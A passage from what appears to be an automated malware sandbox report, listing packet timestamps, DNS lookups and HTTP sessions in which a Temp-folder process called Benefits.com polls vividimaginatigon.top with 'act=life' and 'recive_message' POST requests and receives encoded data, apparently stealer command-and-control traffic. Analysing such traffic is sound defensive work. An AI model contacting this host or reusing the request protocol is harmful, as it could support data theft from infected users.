                                    Jan 31, 2025 19:55:28.430140972 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.431375027 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.431411982 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.431464911 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934027910 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934149981 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934257030 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.934262037 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934288979 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934340954 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.934412956 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934565067 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934648037 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934669971 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.934676886 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.934725046 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.934779882 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.938426018 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.938474894 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.938482046 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:28.979295015 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:28.979300022 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.025996923 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026007891 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.026022911 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026200056 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026215076 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.026221037 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026276112 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.026303053 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026424885 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.026474953 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.047255993 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.047255993 CET49865443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.047262907 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.047271013 CET44349865172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.146538973 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.146574020 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.146641016 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.146982908 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.146997929 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.615515947 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.615601063 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.616630077 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.616633892 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.617618084 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:29.619405031 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.619544983 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:29.619581938 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:32.537827015 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:32.538084984 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:32.538144112 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:32.538268089 CET49876443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:32.538278103 CET44349876172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:32.553515911 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:32.553603888 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:32.553694963 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:32.553977013 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:32.554014921 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.019419909 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.019548893 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.020649910 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.020663977 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.021166086 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.022285938 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.022429943 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.022470951 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.022527933 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.067332983 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.697278976 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.697516918 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.697572947 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.710874081 CET49897443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.710886955 CET44349897172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.812365055 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.812431097 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:33.812520981 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.812869072 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:33.812887907 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:34.278435946 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:34.278513908 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:34.279582977 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:34.279591084 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:34.279906034 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:34.281048059 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:34.281188965 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:34.281213045 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:34.281274080 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:34.281281948 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.059943914 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.060201883 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.060265064 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.060714006 CET49908443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.060740948 CET44349908172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.160105944 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.160152912 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.160232067 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.160509109 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.160525084 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.656233072 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.656321049 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.657668114 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.657682896 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.658708096 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:35.660028934 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.660152912 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:35.660177946 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:36.131203890 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:36.131472111 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:36.131555080 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:36.131858110 CET49916443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:36.131871939 CET44349916172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:36.620800972 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:36.620841980 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:36.620946884 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:36.621256113 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:36.621273041 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.106542110 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.106612921 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.107969999 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.107989073 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.108771086 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.110049009 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.110812902 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.110836029 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.110939026 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.110960960 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.111073971 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111150026 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.111265898 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111284971 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.111413956 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111444950 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.111581087 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111619949 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111643076 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.111793041 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.111828089 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.121592999 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.121824026 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.121910095 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.121963978 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.122025013 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.122198105 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.122267008 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.122355938 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.122471094 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:37.122518063 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:37.122678995 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:38.737098932 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:38.737339020 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:38.737413883 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:38.772949934 CET49926443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:38.772989988 CET44349926172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:38.785373926 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:38.785402060 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:38.785463095 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:38.786031008 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:38.786040068 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.253911972 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.254000902 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.255316973 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.255326033 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.255641937 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.256793022 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.256813049 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.256877899 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.780118942 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.780225039 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.780303955 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.780471087 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.780483007 CET44349941172.67.158.151192.168.2.5
                                    Jan 31, 2025 19:55:39.780493975 CET49941443192.168.2.5172.67.158.151
                                    Jan 31, 2025 19:55:39.780499935 CET44349941172.67.158.151192.168.2.5
                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 31, 2025 19:54:54.097407103 CET6116453192.168.2.51.1.1.1
                                    Jan 31, 2025 19:54:54.106396914 CET53611641.1.1.1192.168.2.5
                                    Jan 31, 2025 19:55:26.768120050 CET6059153192.168.2.51.1.1.1
                                    Jan 31, 2025 19:55:26.914699078 CET53605911.1.1.1192.168.2.5
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Jan 31, 2025 19:54:54.097407103 CET192.168.2.51.1.1.10xe495Standard query (0)aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTDA (IP address)IN (0x0001)false
                                    Jan 31, 2025 19:55:26.768120050 CET192.168.2.51.1.1.10xb42aStandard query (0)vividimaginatigon.topA (IP address)IN (0x0001)false
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Jan 31, 2025 19:54:54.106396914 CET1.1.1.1192.168.2.50xe495Name error (3)aWntkHZhzENhUIyZkjTD.aWntkHZhzENhUIyZkjTDnonenoneA (IP address)IN (0x0001)false
                                    Jan 31, 2025 19:55:26.914699078 CET1.1.1.1192.168.2.50xb42aNo error (0)vividimaginatigon.top172.67.158.151A (IP address)IN (0x0001)false
                                    Jan 31, 2025 19:55:26.914699078 CET1.1.1.1192.168.2.50xb42aNo error (0)vividimaginatigon.top104.21.33.42A (IP address)IN (0x0001)false
                                    • vividimaginatigon.top
                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.549859172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:27 UTC268OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 8
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                    Data Ascii: act=life
                                    2025-01-31 18:55:27 UTC1133INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:27 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=sn51jpg1rel157hbj77hgbca7k; expires=Sat, 01 Feb 2025 18:55:27 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fx8a4mcFbH2tqIAq2%2FZdYZ8HqsFqF97rAr3JXwCFZRvP4NAET9cQpeF8jL5OC6mrIOCWwl04au6eCF1vlex%2F%2BZ%2BvDa2bX2fKKfo2RZl0zvTknnBIQPIPvi%2BbdurYNFg9JMYDz9TDFkA%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abea850c289e16-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1895&min_rtt=1887&rtt_var=725&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=912&delivery_rate=1491317&cwnd=190&unsent_bytes=0&cid=1fba9c87db280ab3&ts=525&x=0"
                                    2025-01-31 18:55:27 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                    Data Ascii: 2ok
                                    2025-01-31 18:55:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    1192.168.2.549865172.67.158.1514432636C:\Users\user\AppData\Local\Temp\224177\Benefits.com
                                    TimestampBytes transferredDirectionData
                                    2025-01-31 18:55:28 UTC269OUTPOST /api HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                    Content-Length: 48
                                    Host: vividimaginatigon.top
                                    2025-01-31 18:55:28 UTC48OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 32 43 6f 57 30 2d 2d 63 68 65 6b 73 61 26 6a 3d
                                    Data Ascii: act=recive_message&ver=4.0&lid=c2CoW0--cheksa&j=
                                    2025-01-31 18:55:28 UTC1137INHTTP/1.1 200 OK
                                    Date: Fri, 31 Jan 2025 18:55:28 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Set-Cookie: PHPSESSID=vmhd0muquov6qqmkaambdmgi91; expires=Sat, 01 Feb 2025 18:55:28 GMT; Max-Age=86400; path=/
                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                    Cache-Control: no-store, no-cache, must-revalidate
                                    Pragma: no-cache
                                    X-Frame-Options: DENY
                                    X-Content-Type-Options: nosniff
                                    X-XSS-Protection: 1; mode=block
                                    cf-cache-status: DYNAMIC
                                    vary: accept-encoding
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A2CJ0Cg5qRRpvskePdBKo%2F1M%2FJcwzIVHeSIhqdl7IRMIYlvJUHEvcurRq9Vr4yuKuCBwzu4wKh%2BDihhO8hRK0rt%2F2vy%2FUSWkt3H7DbeWco6iAY1%2BA5GywXnYKjT3kSyLopZVD3Y1l%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 90abea8b2e3941ef-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    server-timing: cfL4;desc="?proto=TCP&rtt=2226&min_rtt=2214&rtt_var=855&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=953&delivery_rate=1261884&cwnd=203&unsent_bytes=0&cid=ad613918043a28bb&ts=525&x=0"
                                    2025-01-31 18:55:28 UTC232INData Raw: 34 39 39 34 0d 0a 38 46 48 6d 4b 67 4e 70 64 63 5a 37 4d 36 37 34 32 37 46 59 7a 68 49 2f 46 36 74 49 34 36 46 74 48 69 33 7a 68 34 43 48 79 44 4f 4c 63 35 41 49 4f 56 31 5a 35 41 68 57 6a 4d 4b 76 77 79 32 72 50 68 31 32 7a 32 72 5a 78 77 78 79 58 70 61 72 6f 76 47 6c 45 63 6f 33 68 30 5a 77 44 46 6e 6b 48 6b 75 4d 77 6f 44 4b 65 71 74 38 48 53 32 4a 4c 59 6e 44 44 48 4a 50 6b 75 7a 76 39 36 52 51 6d 44 32 42 51 6d 59 4b 45 61 63 58 58 73 75 64 76 74 41 79 6f 48 74 53 66 38 5a 71 7a 34 4d 49 5a 41 2f 4a 70 63 33 69 76 46 4b 39 4d 4a 56 42 49 52 52 5a 76 56 6c 57 77 4e 72 68 6b 7a 6d 72 63 46 4e 78 7a 79 4f 4c 79 51 56 36 54 70 66 74 38 4f 36 75 57 35 67 7a 67 6b 4e 73 41 77 57 71 48 56
                                    Data Ascii: 49948FHmKgNpdcZ7M67427FYzhI/F6tI46FtHi3zh4CHyDOLc5AIOV1Z5AhWjMKvwy2rPh12z2rZxwxyXparovGlEco3h0ZwDFnkHkuMwoDKeqt8HS2JLYnDDHJPkuzv96RQmD2BQmYKEacXXsudvtAyoHtSf8Zqz4MIZA/Jpc3ivFK9MJVBIRRZvVlWwNrhkzmrcFNxzyOLyQV6Tpft8O6uW5gzgkNsAwWqHV
                                    2025-01-31 18:55:28 UTC1369INData Raw: 6e 41 6d 37 54 51 65 75 49 77 57 6d 32 4a 63 73 47 51 50 58 39 65 67 50 44 76 39 61 77 52 6a 58 32 64 43 47 59 48 56 2f 78 5a 57 63 43 55 76 4e 41 31 71 33 46 64 5a 38 59 71 67 73 73 48 65 45 57 65 36 75 33 72 6f 46 61 61 4f 6f 4e 48 5a 67 4d 52 71 78 6f 52 67 74 71 2b 79 33 72 30 4d 48 31 6c 79 69 6d 56 7a 68 34 38 55 4e 2f 38 6f 75 4b 6d 45 63 70 7a 67 6b 5a 67 42 68 65 32 45 56 72 48 6e 36 76 59 4d 36 46 39 58 58 6a 44 4a 59 4c 44 43 48 5a 46 6e 75 2f 6d 36 4b 64 58 6b 6a 50 45 42 69 45 4d 44 2b 52 42 45 65 2b 66 71 64 51 32 75 6a 4a 6e 4e 64 5a 6b 6d 49 4d 49 63 41 2f 4a 70 65 72 67 71 56 4b 5a 50 49 64 41 61 68 6b 58 74 68 39 63 79 59 69 2f 31 6a 53 6d 63 30 39 2f 78 79 79 43 79 67 52 31 53 70 62 68 6f 71 76 71 56 6f 70 7a 33 41 68 41 42 68 79 6f 45
                                    Data Ascii: nAm7TQeuIwWm2JcsGQPX9egPDv9awRjX2dCGYHV/xZWcCUvNA1q3FdZ8YqgssHeEWe6u3roFaaOoNHZgMRqxoRgtq+y3r0MH1lyimVzh48UN/8ouKmEcpzgkZgBhe2EVrHn6vYM6F9XXjDJYLDCHZFnu/m6KdXkjPEBiEMD+RBEe+fqdQ2ujJnNdZkmIMIcA/JpergqVKZPIdAahkXth9cyYi/1jSmc09/xyyCygR1SpbhoqvqVopz3AhABhyoE
                                    2025-01-31 18:55:28 UTC1369INData Raw: 7a 77 53 69 73 66 45 39 35 77 79 79 4f 7a 67 4d 38 41 64 48 69 2b 71 58 79 45 62 67 77 6b 45 74 72 53 53 4b 6e 46 31 2f 4c 6a 50 6e 4d 64 4c 55 77 57 6e 6d 4a 63 73 48 4f 44 6e 52 4a 67 2b 72 76 35 71 52 66 6e 54 61 4c 51 47 45 4c 47 71 45 64 57 73 65 5a 74 4e 63 6f 70 6e 42 56 63 4d 67 67 69 34 4e 42 50 45 69 4a 70 62 71 6c 6d 30 61 5a 63 62 46 4c 62 77 55 51 73 6c 6c 4f 67 6f 50 35 31 44 62 73 4b 42 31 34 77 53 2b 45 7a 41 35 32 51 5a 54 76 37 75 32 6b 55 6f 41 38 67 45 68 74 41 78 32 70 46 31 58 45 6b 37 4c 59 50 4b 78 78 56 7a 57 48 61 6f 62 62 54 79 51 50 70 65 4c 75 36 4b 55 54 70 7a 43 4b 52 6d 59 64 56 37 74 58 53 49 79 64 74 5a 4e 69 37 48 78 55 64 63 49 67 68 63 4d 49 63 55 71 53 34 75 48 6f 72 56 75 63 4e 49 42 45 61 41 59 52 70 42 35 56 79 59
                                    Data Ascii: zwSisfE95wyyOzgM8AdHi+qXyEbgwkEtrSSKnF1/LjPnMdLUwWnmJcsHODnRJg+rv5qRfnTaLQGELGqEdWseZtNcopnBVcMggi4NBPEiJpbqlm0aZcbFLbwUQsllOgoP51DbsKB14wS+EzA52QZTv7u2kUoA8gEhtAx2pF1XEk7LYPKxxVzWHaobbTyQPpeLu6KUTpzCKRmYdV7tXSIydtZNi7HxUdcIghcMIcUqS4uHorVucNIBEaAYRpB5VyY
                                    2025-01-31 18:55:28 UTC1369INData Raw: 37 48 74 6f 65 39 39 71 6e 6f 30 57 50 45 69 64 70 62 71 6c 6f 31 69 41 50 59 70 42 62 41 30 66 6f 78 64 63 78 35 79 79 31 44 32 71 66 56 56 34 7a 43 6d 41 78 77 56 75 54 4a 72 76 37 2b 2f 71 48 39 49 30 6e 41 67 35 53 7a 43 6f 4d 45 48 58 69 4b 2b 54 4a 65 4a 70 48 58 4c 46 61 74 6d 44 44 48 4e 47 6e 75 33 71 36 71 56 56 6e 44 57 43 52 57 51 45 48 62 59 52 58 38 47 52 74 74 67 6f 72 48 31 5a 65 63 30 69 69 73 6c 50 4d 67 2b 57 2f 61 4b 39 36 6d 53 66 50 49 52 4c 64 30 73 49 36 67 41 52 79 35 62 35 69 33 71 67 66 6c 31 36 78 53 61 4b 79 77 35 77 51 5a 62 67 36 2b 32 69 51 35 4d 33 6a 45 6c 76 42 42 61 67 48 46 54 49 6e 62 33 56 4e 65 77 2b 48 58 4c 52 61 74 6d 44 49 46 74 36 30 38 54 59 70 62 55 66 69 33 4f 44 52 43 46 54 56 36 67 61 58 63 53 56 76 39 6f
                                    Data Ascii: 7Htoe99qno0WPEidpbqlo1iAPYpBbA0foxdcx5yy1D2qfVV4zCmAxwVuTJrv7+/qH9I0nAg5SzCoMEHXiK+TJeJpHXLFatmDDHNGnu3q6qVVnDWCRWQEHbYRX8GRttgorH1Zec0iislPMg+W/aK96mSfPIRLd0sI6gARy5b5i3qgfl16xSaKyw5wQZbg6+2iQ5M3jElvBBagHFTInb3VNew+HXLRatmDIFt608TYpbUfi3ODRCFTV6gaXcSVv9o
                                    2025-01-31 18:55:28 UTC1369INData Raw: 54 58 44 49 59 58 41 43 33 6c 41 6b 4f 54 6b 39 36 31 59 67 44 32 4a 52 32 6b 44 48 71 55 64 56 4d 47 63 74 64 6b 37 71 33 35 54 66 59 6c 6b 77 63 51 58 50 42 66 52 78 50 4c 2b 75 45 65 66 45 6f 6c 48 49 52 52 5a 76 56 6c 57 77 4e 72 68 6b 7a 4f 2b 64 46 42 6e 77 43 32 50 7a 41 78 75 54 70 7a 75 38 4f 4b 6c 56 5a 55 2f 67 6b 64 6e 43 68 4b 75 46 56 62 4a 6b 62 62 66 65 75 49 77 57 6d 32 4a 63 73 48 74 42 47 39 59 6b 75 76 70 38 37 45 52 6a 58 32 64 43 47 59 48 56 2f 78 5a 55 73 65 52 76 64 4d 32 72 48 52 51 64 64 73 6c 68 73 51 47 64 31 32 62 34 75 58 75 6f 6c 71 64 4e 5a 5a 45 62 78 6b 53 74 67 73 52 67 74 71 2b 79 33 72 30 4d 47 74 79 32 54 71 43 67 54 35 71 54 49 66 75 37 2b 6e 71 54 74 77 71 78 45 39 74 53 30 2f 6b 48 31 37 46 6d 62 62 53 4d 36 42 39
                                    Data Ascii: TXDIYXAC3lAkOTk961YgD2JR2kDHqUdVMGctdk7q35TfYlkwcQXPBfRxPL+uEefEolHIRRZvVlWwNrhkzO+dFBnwC2PzAxuTpzu8OKlVZU/gkdnChKuFVbJkbbfeuIwWm2JcsHtBG9Ykuvp87ERjX2dCGYHV/xZUseRvdM2rHRQddslhsQGd12b4uXuolqdNZZEbxkStgsRgtq+y3r0MGty2TqCgT5qTIfu7+nqTtwqxE9tS0/kH17FmbbSM6B9
